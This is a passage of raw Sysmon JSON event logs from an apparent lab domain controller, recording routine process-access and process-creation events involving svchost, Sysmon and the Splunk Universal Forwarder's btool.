07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2069,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2070,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2071,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2072,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2073,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010F7EE0300}\r\nTargetProcessId: 4032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010F7EE0300}","TargetProcessId":"4032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2074,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.831\r\nProcessGuid: {41C8662E-1F77-5F25-0000-0010B8EF0300}\r\nProcessId: 2692\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F77-5F25-0000-0010F7EE0300}\r\nParentProcessId: 4032\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.831","ProcessGuid":"{41C8662E-1F77-5F25-0000-0010B8EF0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F77-5F25-0000-0010F7EE0300}","ParentProcessId":"4032","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2075,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F77-5F25-0000-0010F7EE0300}\r\nSourceProcessId: 4032\r\nSourceThreadId: 4044\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010B8EF0300}\r\nTargetProcessId: 2692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F77-5F25-0000-0010F7EE0300}","SourceProcessId":"4032","SourceThreadId":"4044","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010B8EF0300}","TargetProcessId":"2692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2076,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010B8EF0300}\r\nTargetProcessId: 2692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010B8EF0300}","TargetProcessId":"2692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2077,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 